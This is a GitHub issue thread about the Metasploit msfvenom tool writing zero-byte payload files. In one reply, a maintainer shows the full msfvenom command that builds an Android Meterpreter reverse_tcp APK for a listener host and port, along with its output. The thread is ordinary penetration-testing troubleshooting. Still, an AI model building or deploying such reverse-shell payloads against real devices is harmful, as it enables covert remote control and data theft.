### ISSUE TITLE
0 size payload 

### ISSUE THREAD

**Issue by amartyanambiar** [rapid7/metasploit-framework#13915]
## Current behavior
![image](https://user-images.githubusercontent.com/51471924/88704823-497e4680-d12c-11ea-9bb3-9f4116001481.png)

Why is this happening? I always get zero sized files.

**Comment by red0xff** [comment]
You didn't use the issue template, specify the version of metasploit you are using, how you installed it, and the other details required for reproducing the issue (refer to the template).

As for the issue in itself, `Attempting to read payload from stdin` suggests that it didn't use the payload you specified.
It's working fine for me, tested on `metasploit v5.0.88-dev`.

(unrelated tip : hiding your private IP is pointless, as it's private anyway)

**Comment by timwr** [comment]
I can't reproduce this:
```
$ ./msfvenom --platform Android --arch dalvik -p android/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 R> lol.apk
No encoder specified, outputting raw payload
Payload size: 10188 bytes

$ file lol.apk
lol.apk: Zip archive data, at least v2.0 to extract
```
